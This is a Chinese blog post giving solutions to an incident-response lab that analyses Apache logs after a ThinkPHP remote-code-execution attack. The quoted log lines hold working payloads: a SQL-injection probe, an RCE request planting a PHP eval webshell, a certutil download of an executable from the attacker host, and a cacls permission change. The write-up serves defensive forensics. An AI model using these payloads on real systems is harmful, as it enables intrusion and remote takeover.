<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="简介12345678账号：Administrator 密码：Admin1231.请提交攻击者攻击成功的第一时间2.请提交攻击者的浏览器版本3.请提交攻击者目录扫描所使用的工具名称4.找到攻击者写入的恶意后门文件，提交文件名（完整路径）5.请提交攻击者通过漏洞从远程黑客主机服务器下载的程序名称，并将保存的文件绝对路径作为FLAG提交（包含文件名）6.请提交攻击者执行过几次修改文件访问权限的命令7.请">
<meta property="og:type" content="article">
<meta property="og:title" content="应急响应_thinkphpRCE日志分析">
<meta property="og:url" content="https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="Liangmo_sec">
<meta property="og:description" content="简介12345678账号：Administrator 密码：Admin1231.请提交攻击者攻击成功的第一时间2.请提交攻击者的浏览器版本3.请提交攻击者目录扫描所使用的工具名称4.找到攻击者写入的恶意后门文件，提交文件名（完整路径）5.请提交攻击者通过漏洞从远程黑客主机服务器下载的程序名称，并将保存的文件绝对路径作为FLAG提交（包含文件名）6.请提交攻击者执行过几次修改文件访问权限的命令7.请">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424010703438.png">
<meta property="og:image" content="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424020553288.png">
<meta property="og:image" content="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424021515101.png">
<meta property="og:image" content="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424022020889.png">
<meta property="og:image" content="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424022607186.png">
<meta property="og:image" content="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424024840049.png">
<meta property="article:published_time" content="2025-04-23T16:40:00.000Z">
<meta property="article:modified_time" content="2025-04-23T18:52:17.727Z">
<meta property="article:author" content="凉墨">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424010703438.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>应急响应_thinkphpRCE日志分析</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/links/">Links</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/04/23/tomcat%E6%9A%97%E9%93%BE%E6%8E%92%E6%9F%A5/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&text=应急响应_thinkphpRCE日志分析"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&is_video=false&description=应急响应_thinkphpRCE日志分析"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=应急响应_thinkphpRCE日志分析&body=Check out this article: https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&name=应急响应_thinkphpRCE日志分析&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&t=应急响应_thinkphpRCE日志分析"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">简介</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E6%94%BB%E5%87%BB%E6%88%90%E5%8A%9F%E7%9A%84%E7%AC%AC%E4%B8%80%E6%97%B6%E9%97%B4"><span class="toc-number">1.1.</span> <span class="toc-text">1.请提交攻击者攻击成功的第一时间</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E7%9A%84%E6%B5%8F%E8%A7%88%E5%99%A8%E7%89%88%E6%9C%AC"><span class="toc-number">1.2.</span> <span class="toc-text">2.请提交攻击者的浏览器版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E6%89%80%E4%BD%BF%E7%94%A8%E7%9A%84%E5%B7%A5%E5%85%B7%E5%90%8D%E7%A7%B0"><span class="toc-number">1.3.</span> <span class="toc-text">3.请提交攻击者目录扫描所使用的工具名称</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%89%BE%E5%88%B0%E6%94%BB%E5%87%BB%E8%80%85%E5%86%99%E5%85%A5%E7%9A%84%E6%81%B6%E6%84%8F%E5%90%8E%E9%97%A8%E6%96%87%E4%BB%B6%EF%BC%8C%E6%8F%90%E4%BA%A4%E6%96%87%E4%BB%B6%E5%90%8D%EF%BC%88%E5%AE%8C%E6%95%B4%E8%B7%AF%E5%BE%84%EF%BC%89"><span class="toc-number">1.4.</span> <span class="toc-text">4.找到攻击者写入的恶意后门文件，提交文件名（完整路径）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E9%80%9A%E8%BF%87%E6%BC%8F%E6%B4%9E%E4%BB%8E%E8%BF%9C%E7%A8%8B%E9%BB%91%E5%AE%A2%E4%B8%BB%E6%9C%BA%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8B%E8%BD%BD%E7%9A%84%E7%A8%8B%E5%BA%8F%E5%90%8D%E7%A7%B0%EF%BC%8C%E5%B9%B6%E5%B0%86%E4%BF%9D%E5%AD%98%E7%9A%84%E6%96%87%E4%BB%B6%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84%E4%BD%9C%E4%B8%BAFLAG%E6%8F%90%E4%BA%A4%EF%BC%88%E5%8C%85%E5%90%AB%E6%96%87%E4%BB%B6%E5%90%8D%EF%BC%89"><span class="toc-number">1.5.</span> <span class="toc-text">5.请提交攻击者通过漏洞从远程黑客主机服务器下载的程序名称，并将保存的文件绝对路径作为FLAG提交（包含文件名）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E6%89%A7%E8%A1%8C%E8%BF%87%E5%87%A0%E6%AC%A1%E4%BF%AE%E6%94%B9%E6%96%87%E4%BB%B6%E8%AE%BF%E9%97%AE%E6%9D%83%E9%99%90%E7%9A%84%E5%91%BD%E4%BB%A4"><span class="toc-number">1.6.</span> <span class="toc-text">6.请提交攻击者执行过几次修改文件访问权限的命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-%E8%AF%B7%E6%8C%87%E5%87%BA%E5%8F%AF%E7%96%91%E8%BF%9B%E7%A8%8B%E9%87%87%E7%94%A8%E7%9A%84%E8%87%AA%E5%8A%A8%E5%90%AF%E5%8A%A8%E7%9A%84%E6%96%B9%E5%BC%8F"><span class="toc-number">1.7.</span> <span class="toc-text">7.请指出可疑进程采用的自动启动的方式</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        应急响应_thinkphpRCE日志分析
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">凉墨</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-04-23T16:40:00.000Z" class="dt-published" itemprop="datePublished">2025-04-24</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/">应急响应</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">账号：Administrator 密码：Admin123</span><br><span class="line">1.请提交攻击者攻击成功的第一时间</span><br><span class="line">2.请提交攻击者的浏览器版本</span><br><span class="line">3.请提交攻击者目录扫描所使用的工具名称</span><br><span class="line">4.找到攻击者写入的恶意后门文件，提交文件名（完整路径）</span><br><span class="line">5.请提交攻击者通过漏洞从远程黑客主机服务器下载的程序名称，并将保存的文件绝对路径作为FLAG提交（包含文件名）</span><br><span class="line">6.请提交攻击者执行过几次修改文件访问权限的命令</span><br><span class="line">7.请指出可疑进程采用的自动启动的方式</span><br></pre></td></tr></table></figure>

<h3 id="1-请提交攻击者攻击成功的第一时间"><a href="#1-请提交攻击者攻击成功的第一时间" class="headerlink" title="1.请提交攻击者攻击成功的第一时间"></a>1.请提交攻击者攻击成功的第一时间</h3><blockquote>
<p>启动发现phpStudy存在Apache+Mysql<br>日志目录：C:\phpStudy\PHPTutorial\Apache\logs</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424010703438.png" alt="image-20250424010703438"><img src="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424020553288.png" alt="image-20250424020553288"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">172.16.1.242 - - [10/Jul/2023:22:00:23  0800] &quot;GET /yxcms/index.php?r=default/news/content&amp;id=16&#x27; and 1=2 # HTTP/1.1&quot; 404 2373 &quot;-&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36&quot;</span><br><span class="line">172.16.1.242 - - [10/Jul/2023:22:00:23  0800] &quot;GET /yxcms/public/images/404.jpg HTTP/1.1&quot; 200 3204 &quot;http://172.16.1.206/yxcms/index.php?r=default/news/content&amp;id=16&#x27; and 1=2 #&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36&quot;</span><br><span class="line">10/Jul/2023:22:00:23</span><br></pre></td></tr></table></figure>

<h3 id="2-请提交攻击者的浏览器版本"><a href="#2-请提交攻击者的浏览器版本" class="headerlink" title="2.请提交攻击者的浏览器版本"></a>2.请提交攻击者的浏览器版本</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">由1得 Chrome/114.0.0.0</span><br></pre></td></tr></table></figure>

<h3 id="3-请提交攻击者目录扫描所使用的工具名称"><a href="#3-请提交攻击者目录扫描所使用的工具名称" class="headerlink" title="3.请提交攻击者目录扫描所使用的工具名称"></a>3.请提交攻击者目录扫描所使用的工具名称</h3><p><img src="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424021515101.png" alt="image-20250424021515101"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DIRSEARCH</span><br></pre></td></tr></table></figure>

<h3 id="4-找到攻击者写入的恶意后门文件，提交文件名（完整路径）"><a href="#4-找到攻击者写入的恶意后门文件，提交文件名（完整路径）" class="headerlink" title="4.找到攻击者写入的恶意后门文件，提交文件名（完整路径）"></a>4.找到攻击者写入的恶意后门文件，提交文件名（完整路径）</h3><p><code>cat access.log|grep &quot;172.16.1.242&quot;|grep &quot;POST&quot;</code></p>
<p><img src="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424022020889.png" alt="image-20250424022020889"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">172.16.1.242 - - [10/Jul/2023:22:17:24  0800] &quot;GET /index.php?s=index/think\\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]= echo &quot;&lt;?php @eval($_POST[cmd]);?&gt;&quot; &gt; &quot;C:/phpStudy/PHPTutorial/WWW/public/config.php&quot; HTTP/1.1&quot; 200 - &quot;-&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36&quot;</span><br><span class="line">C:/phpStudy/PHPTutorial/WWW/public/config.php</span><br></pre></td></tr></table></figure>

<h3 id="5-请提交攻击者通过漏洞从远程黑客主机服务器下载的程序名称，并将保存的文件绝对路径作为FLAG提交（包含文件名）"><a href="#5-请提交攻击者通过漏洞从远程黑客主机服务器下载的程序名称，并将保存的文件绝对路径作为FLAG提交（包含文件名）" class="headerlink" title="5.请提交攻击者通过漏洞从远程黑客主机服务器下载的程序名称，并将保存的文件绝对路径作为FLAG提交（包含文件名）"></a>5.请提交攻击者通过漏洞从远程黑客主机服务器下载的程序名称，并将保存的文件绝对路径作为FLAG提交（包含文件名）</h3><p><code> cat access.log|grep &quot;172.16.1.242&quot;|grep &quot;system&amp;vars&quot;</code></p>
<p><img src="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424022607186.png" alt="image-20250424022607186"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">172.16.1.242 - - [10/Jul/2023:22:40:58  0800] &quot;GET /index.php?s=index/think\\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=certutil -urlcache -split -f http://172.16.1.242/systemd.exe C:/windows/systemd.exe HTTP/1.1&quot; 200 109 &quot;-&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36&quot;</span><br><span class="line">C:/windows/systemd.exe</span><br></pre></td></tr></table></figure>

<h3 id="6-请提交攻击者执行过几次修改文件访问权限的命令"><a href="#6-请提交攻击者执行过几次修改文件访问权限的命令" class="headerlink" title="6.请提交攻击者执行过几次修改文件访问权限的命令"></a>6.请提交攻击者执行过几次修改文件访问权限的命令</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">由5得</span><br><span class="line">172.16.1.242 - - [10/Jul/2023:22:43:53  0800] &quot;GET /index.php?s=index/think\\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=C:/windows/systemd.exe HTTP/1.1&quot; 200 - &quot;-&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36&quot;172.16.1.242 - - [10/Jul/2023:22:57:53  0800] &quot;GET /index.php?s=index/think\\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=cacls C:/windows/systemd.exe /G Everyone:F /e HTTP/1.1&quot; 200 70 &quot;-&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36&quot;</span><br><span class="line">cacls C:/windows/systemd.exe /G Everyone:F /e</span><br><span class="line">1次</span><br></pre></td></tr></table></figure>

<h3 id="7-请指出可疑进程采用的自动启动的方式"><a href="#7-请指出可疑进程采用的自动启动的方式" class="headerlink" title="7.请指出可疑进程采用的自动启动的方式"></a>7.请指出可疑进程采用的自动启动的方式</h3><p><code>msconfig</code></p>
<p><img src="https://raw.githubusercontent.com/liangmosec/images/master/imgs/image-20250424024840049.png" alt="image-20250424024840049"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">开机自启动</span><br></pre></td></tr></table></figure>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">Categories</a></li>
        
          <li><a href="/links/">Links</a></li>
        
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">简介</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E6%94%BB%E5%87%BB%E6%88%90%E5%8A%9F%E7%9A%84%E7%AC%AC%E4%B8%80%E6%97%B6%E9%97%B4"><span class="toc-number">1.1.</span> <span class="toc-text">1.请提交攻击者攻击成功的第一时间</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E7%9A%84%E6%B5%8F%E8%A7%88%E5%99%A8%E7%89%88%E6%9C%AC"><span class="toc-number">1.2.</span> <span class="toc-text">2.请提交攻击者的浏览器版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E6%89%80%E4%BD%BF%E7%94%A8%E7%9A%84%E5%B7%A5%E5%85%B7%E5%90%8D%E7%A7%B0"><span class="toc-number">1.3.</span> <span class="toc-text">3.请提交攻击者目录扫描所使用的工具名称</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%89%BE%E5%88%B0%E6%94%BB%E5%87%BB%E8%80%85%E5%86%99%E5%85%A5%E7%9A%84%E6%81%B6%E6%84%8F%E5%90%8E%E9%97%A8%E6%96%87%E4%BB%B6%EF%BC%8C%E6%8F%90%E4%BA%A4%E6%96%87%E4%BB%B6%E5%90%8D%EF%BC%88%E5%AE%8C%E6%95%B4%E8%B7%AF%E5%BE%84%EF%BC%89"><span class="toc-number">1.4.</span> <span class="toc-text">4.找到攻击者写入的恶意后门文件，提交文件名（完整路径）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E9%80%9A%E8%BF%87%E6%BC%8F%E6%B4%9E%E4%BB%8E%E8%BF%9C%E7%A8%8B%E9%BB%91%E5%AE%A2%E4%B8%BB%E6%9C%BA%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8B%E8%BD%BD%E7%9A%84%E7%A8%8B%E5%BA%8F%E5%90%8D%E7%A7%B0%EF%BC%8C%E5%B9%B6%E5%B0%86%E4%BF%9D%E5%AD%98%E7%9A%84%E6%96%87%E4%BB%B6%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84%E4%BD%9C%E4%B8%BAFLAG%E6%8F%90%E4%BA%A4%EF%BC%88%E5%8C%85%E5%90%AB%E6%96%87%E4%BB%B6%E5%90%8D%EF%BC%89"><span class="toc-number">1.5.</span> <span class="toc-text">5.请提交攻击者通过漏洞从远程黑客主机服务器下载的程序名称，并将保存的文件绝对路径作为FLAG提交（包含文件名）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-%E8%AF%B7%E6%8F%90%E4%BA%A4%E6%94%BB%E5%87%BB%E8%80%85%E6%89%A7%E8%A1%8C%E8%BF%87%E5%87%A0%E6%AC%A1%E4%BF%AE%E6%94%B9%E6%96%87%E4%BB%B6%E8%AE%BF%E9%97%AE%E6%9D%83%E9%99%90%E7%9A%84%E5%91%BD%E4%BB%A4"><span class="toc-number">1.6.</span> <span class="toc-text">6.请提交攻击者执行过几次修改文件访问权限的命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-%E8%AF%B7%E6%8C%87%E5%87%BA%E5%8F%AF%E7%96%91%E8%BF%9B%E7%A8%8B%E9%87%87%E7%94%A8%E7%9A%84%E8%87%AA%E5%8A%A8%E5%90%AF%E5%8A%A8%E7%9A%84%E6%96%B9%E5%BC%8F"><span class="toc-number">1.7.</span> <span class="toc-text">7.请指出可疑进程采用的自动启动的方式</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&text=应急响应_thinkphpRCE日志分析"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&is_video=false&description=应急响应_thinkphpRCE日志分析"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=应急响应_thinkphpRCE日志分析&body=Check out this article: https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
